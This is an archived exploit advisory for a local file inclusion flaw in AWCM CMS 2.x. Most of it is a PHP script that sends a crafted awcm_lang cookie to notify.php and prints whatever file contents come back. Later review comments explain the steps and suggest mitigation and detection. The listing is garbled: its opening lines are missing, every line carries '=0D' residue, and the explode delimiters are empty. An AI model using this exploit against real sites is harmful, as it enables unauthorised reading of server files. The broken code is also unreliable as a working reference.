


Awcm Cms Local File Inclusion Vulnerability



Awcm Cms Local File Inclusion Vulnerability
Awcm Cms Local File Inclusion Vulnerability



# Author: SwEET-DeViL
# Published: 10-6-2010
# Software Link: http://www.awcm-cms.com/
# Download Software: http://sourceforge.net/projects/awcm/
# Version: 2.x
# Tested on: Linux

Exploit :
=0D
"http://".$host.$argv[2];=0D 
       // NOTE(review): the start of this script (opening PHP tag, argument handling,
       // the assignments of $host and $Path) is missing from the archived page, and
       // every line carries "=0D" quoted-printable residue, so the listing is not
       // runnable as shown.
       //
       // Build a raw HTTP/1.0 GET for notify.php. The only caller-controlled header
       // is the awcm_lang cookie, filled from the third command-line argument. Given
       // the advisory title, notify.php presumably uses that cookie value to build a
       // file include path without validating it — confirm against the AWCM source.
       // Mitigation: accept only an allow-list of installed language names for
       // awcm_lang and never concatenate the raw cookie into an include path.
       // Detection: review web logs for notify.php requests whose awcm_lang cookie
       // is not a plain language name.
       $CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";=0D
       $CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";=0D
       $CURL_in.="Pragma: no-cache\r\n";=0D
       $CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";=0D
       $CURL_in.="Connection: Close\r\n\r\n";=0D
=0D
       // Abort when no cookie value was supplied; the check runs after the request
       // string has already been assembled.
       if ( empty($argv[3]) ){=0D
               echo "\n[-] Error : Exploit failed\n";=0D
               die;=0D
       }=0D
=0D
       // Plain TCP connection to port 80; "@" suppresses PHP's own connection warning
       // so only the message below is shown on failure.
       $FoN = @fsockopen($host, 80);=0D
       if(!$FoN){=0D
               echo "\n[-] Error : Can't connect to ".$host." !!\n";=0D
               die;=0D
       }=0D
=0D
       // Send the request and read the whole response into $data in 1024-byte reads.
       // $data is not initialised in the visible lines.
       fputs($FoN, $CURL_in);=0D
       while (!feof($FoN)) $data .= fread($FoN, 1024);=0D
       fclose($FoN);=0D
=0D
       // Stop if the response contains a 404 status line (substring match on the
       // exact text below).
       $error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );=0D
       if ( !empty($error_1) ){=0D
               echo "\n[-] Error : 404 Not Found. \n";=0D
               die;=0D
       }=0D
=0D
       // Same check for a 406 status line.
       $error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );=0D
       if ( !empty($error_2) ){=0D
               echo "\n[-] Error : 406 Not Acceptable. \n";=0D
               die;=0D
       }=0D
=0D
=0D
=0D
// NOTE(review): both explode() calls show an empty delimiter. The original
// delimiters were presumably markup strings removed when the page was archived;
// they cannot be recovered from this listing.
$EXc = explode("",$data);=0D
$EXx = explode("",$EXc[1]);=0D
// Strip tags from the extracted fragment, drop carriage returns and tabs, then trim.
$CODE = strip_tags($EXx[0]);=0D
$CODE2 = preg_replace("/\r|\t/",'',$CODE);=0D
$CODE2 = trim($CODE2);=0D
=0D
// Report "File not Found" when nothing was extracted; otherwise print the extracted
// text followed by a ruler line.
if (empty($CODE2)){=0D
print ('=0D
=0D
[-] Error : Sorry! File not Found=0D
=0D
');=0D
}else{=0D
print ('=0D
[+]=0D
------------------------------------------------------------=0D
').$CODE2;=0D
=0D
=0D
=0D
print ('=0D
=0D
------------------------------------------------------------=0D
');=0D
=0D
}=0D
=0D
?>

